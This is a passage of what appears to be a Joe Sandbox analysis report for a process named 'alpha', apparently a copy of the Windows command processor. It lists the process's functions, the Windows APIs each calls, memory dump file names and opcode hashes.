Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ConsoleMode_get_osfhandle
String ID: CMD.EXE
API String ID: 1606018815-3025314500
Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
Instruction ID: a74c0930e76aad206f73b3067b884e16ca9d25f029c008ff24f959ef251b67dd
Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
Instruction Fuzzy Hash: 90410E35A09602DBE7446B15E854178BFA0FB8A753FF89178C91E477A4DFBCA848C630

Function 00007FF7823DC620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleTitleW.KERNELBASE ref: 00007FF7823DC65E
wcschr.MSVCRT ref: 00007FF7823DC792

Strings

:, xrefs: 00007FF7823DC9E2
/, xrefs: 00007FF7823DCA1B

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ConsoleTitlewcschr
String ID: /$:
API String ID: 2364928044-4222935259
Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
Instruction ID: 3b5060f0f0f338e586d6c412f36b98331510e08dcf1ea8091f1c33eb779f6140
Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
Instruction Fuzzy Hash: A8C1E361E2864291EA54BB25D4287BDE2A1FF40B82FF44979DD1E47AD1DFBCE844C320

Function 00007FF7823E8D80 Relevance: 9.1, APIs: 6, Instructions: 95
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF7823E8DC4
_amsg_exit.MSVCRT ref: 00007FF7823E8DE0
_initterm.MSVCRT ref: 00007FF7823E8E64
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7823E8E91
exit.MSVCRT ref: 00007FF7823E8EDE
_cexit.MSVCRT ref: 00007FF7823E8EED

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
String ID:
API String ID: 4291973834-0
Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
Instruction ID: dc3a7a5768d92eed43a4a366496f30c0b21a541ec11bf80ee71cb4318de85f04
Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
Instruction Fuzzy Hash: C841FA39E08602D2F690BB11E950279A6A0FF88746FE40479D91D47AA1DFFDEC88C770

Function 00007FF7823D89C0 Relevance: 9.1, APIs: 6, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF7823D8A18

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

GetDriveTypeW.KERNELBASE ref: 00007FF7823D8A62
GetVolumeInformationW.KERNELBASE ref: 00007FF7823D8ABA
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D8AE1
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823EB3FC
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823EB424

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$DriveErrorInformationLastTypeVolume
String ID:
API String ID: 850181435-0
Opcode ID: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
Instruction ID: ab6de0db48675df47cc683d9f009f9cfdb5be3c0029cbe4223905549a8417287
Opcode Fuzzy Hash: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
Instruction Fuzzy Hash: F341B136608BC1C9E7709F21D8542E9BBA0FB89B45FA44465DA4D47F48CF78D98AC720

Function 00007FF7823E4A14 Relevance: 7.5, APIs: 5, Instructions: 49
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A28
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A66
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A7D
memmove.MSVCRT(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A9A
FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4AA2

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
String ID:
API String ID: 1623332820-0
Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
Instruction ID: 3997613204cc3af9422d16ec17921c005e864a1acfdc9a00d026a7f41c8fedd8
Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
Instruction Fuzzy Hash: 91118F26A14B4282DA50AB02F414139BFA0FB8DF91BA99078DF4E03B44DE7DE885D760

Function 00007FF7823E5CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7823FC9EE,?,?,?,00007FF7823FEA6C,?,?,?,00007FF7823FE925), ref: 00007FF7823E5CCB
GetExitCodeProcess.KERNELBASE(?,?,?,00007FF7823FC9EE,?,?,?,00007FF7823FEA6C,?,?,?,00007FF7823FE925), ref: 00007FF7823E5CDF
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823E5D03
fprintf.MSVCRT ref: 00007FF7823EF4A9
fflush.MSVCRT ref: 00007FF7823EF4C2

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
String ID:
API String ID: 1826527819-0
Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
Instruction ID: a2ff4468f06232dc70d880a1e7dd6d4cb6fe6ade86fd3c9ce0328764aba34dfa
Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
Instruction Fuzzy Hash: E90139719086828AE640BB25E4541B8FEA1FB8E756FA45174D94F07792DEBCA888C730

Function 00007FF7823E3060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E1EA0: wcschr.MSVCRT(?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823E1EB3

SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7823D92AC), ref: 00007FF7823E30CA
SetErrorMode.KERNELBASE ref: 00007FF7823E30DD
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E30F6
SetErrorMode.KERNELBASE ref: 00007FF7823E3106

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ErrorMode$FullNamePathwcschr
String ID:
API String ID: 1464828906-0
Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
Instruction ID: 312ad0231d6973ac99dde9145f20c9e4e3b21c6ba7f742d4f0bfbd9db51933b7
Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
Instruction Fuzzy Hash: 5A31C425A0865592E764BF15E41007EF660FB45B92FE48178DA4E43FD0DEFDE849C320

Function 00007FF7823DCA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823DCAB3
??_V@YAXPEAX@Z.MSVCRT(?,?,?,00007FF7823D139E), ref: 00007FF7823EC706

Strings

onecore\base\cmd\maxpathawarestring.cpp, xrefs: 00007FF7823EC6E5

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset
String ID: onecore\base\cmd\maxpathawarestring.cpp
API String ID: 2221118986-3416068913
Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
Instruction ID: 423b76c4641fe05239adfcc9ab6d587cde1923ab0086d4ed8240f3d0783d2ba6
Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
Instruction Fuzzy Hash: 87112921A1874280EF50EB55E1642B99290BF84BE5FB84779EE6D4BBD5DE7CD480C320

Function 00007FF7823DBE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823DBE52

Part of subcall function 00007FF7823DBFF0: wcschr.MSVCRT(00000001,00000000,?,00007FF7823DBEC8), ref: 00007FF7823DC03E

Strings

2, xrefs: 00007FF7823DBF20
COMSPEC, xrefs: 00007FF7823DBFC7

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memsetwcschr
String ID: 2$COMSPEC
API String ID: 1764819092-1738800741
Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
Instruction ID: 3e4a6c0cf2ccdfd2396138fb7afe1a49a3760ee3bf817341686a5cb0ab7cbccc
Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
Instruction Fuzzy Hash: 685197A1E08342A5FB607B31A468379E396BF44B86FB44079DA4D43ED5DEACE844C760

Function 00007FF7823E2EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00007FF7823E2FA1
wcschr.MSVCRT ref: 00007FF7823E2FBC

Part of subcall function 00007FF7823E823C: FindFirstFileExW.KERNELBASE ref: 00007FF7823E8280
Part of subcall function 00007FF7823E823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E829D

wcsrchr.MSVCRT ref: 00007FF7823E2FEF

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$ErrorFileFindFirstLastwcsrchr
String ID:
API String ID: 4254246844-0
Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
Instruction ID: c39dd80a59581e210bd5026aa9b88c4c8f8fbae6fed3db53ba25dc5fa151d35f
Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
Instruction Fuzzy Hash: A441B325F0874296EE10AB00E4643B9E7A0FF89792FE44479D94E47F90DFBCE849C620

Function 00007FF7823E498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E49BA
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823E49C8
RtlFreeHeap.NTDLL ref: 00007FF7823E49E0

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$EnvironmentFreeProcessVariable
String ID:
API String ID: 2643372051-0
Opcode ID: 3eb4ce940398ca8009a7b16f8ee82d547b33230cfdd527662f43d3989e43a2d7
Instruction ID: 66b3211645dbcc113554455a9723c0d26cd1546e27b955e3aad18ac803aeb091
Opcode Fuzzy Hash: 3eb4ce940398ca8009a7b16f8ee82d547b33230cfdd527662f43d3989e43a2d7
Instruction Fuzzy Hash: 44F08672B19B4285EB40AB66F404075FEE1FF5D7A2BA59274D63E03794DEBC9884C220

Function 00007FF7823E5A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823E5A89
SetConsoleMode.KERNELBASE ref: 00007FF7823E5A9E
_get_osfhandle.MSVCRT ref: 00007FF7823E5AAC

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _get_osfhandle$ConsoleMode
String ID:
API String ID: 1591002910-0
Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
Instruction ID: 815b9e161b42dcbc00516e1450e09704d648b3bfa50ebe8309110365b97ac533
Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
Instruction Fuzzy Hash: BEF06235A19702CBE644AB11E945078BEA0FB8A712BB44134C90E87324DEBCA889CB30

Function 00007FF7823E291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNELBASE ref: 00007FF7823E294A

Strings

:, xrefs: 00007FF7823E2942

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: DriveType
String ID: :
API String ID: 338552980-336475711
Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
Instruction ID: 1552b9c495b1198f31b028748a6ad8fad45433ecd7d8cfc6121c96ffa56d126e
Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
Instruction Fuzzy Hash: 39E06567618640C6D7209B50E45106AF760FB8D749FD41525D98D83B24DB3CD199CF18

Function 00007FF7823E5AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823DCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
Part of subcall function 00007FF7823DCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD

Part of subcall function 00007FF7823E0A6C: _wcsnicmp.MSVCRT ref: 00007FF7823E0AFE
Part of subcall function 00007FF7823E0A6C: memset.MSVCRT ref: 00007FF7823E0B37
Part of subcall function 00007FF7823E0A6C: wcschr.MSVCRT ref: 00007FF7823E0B91
Part of subcall function 00007FF7823E0A6C: wcsrchr.MSVCRT ref: 00007FF7823E0C14

GetConsoleTitleW.KERNELBASE ref: 00007FF7823E5B52

Part of subcall function 00007FF7823E4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E4297
Part of subcall function 00007FF7823E4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E42D7
Part of subcall function 00007FF7823E4224: memset.MSVCRT ref: 00007FF7823E42FD
Part of subcall function 00007FF7823E4224: memset.MSVCRT ref: 00007FF7823E4368
Part of subcall function 00007FF7823E4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E4380
Part of subcall function 00007FF7823E4224: wcsrchr.MSVCRT ref: 00007FF7823E43E6
Part of subcall function 00007FF7823E4224: lstrcmpW.KERNELBASE ref: 00007FF7823E4401

GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7823E5BC7

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
String ID:
API String ID: 497088868-0
Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
Instruction ID: f65f30f7ad848f1a1487826c341d407ed2b9ceb31849316831eeba10f3cbadfa
Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
Instruction Fuzzy Hash: 7931D564B1C68252FA20B711E4741BDE290FF89B82FE44479E94E87F95DEBCE405C720

Function 00007FF7823E3A0C Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?,?,?,00007FF7823FEAC5,?,?,?,00007FF7823FE925,?,?,?,?,00007FF7823DB9B1), ref: 00007FF7823E3A56

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

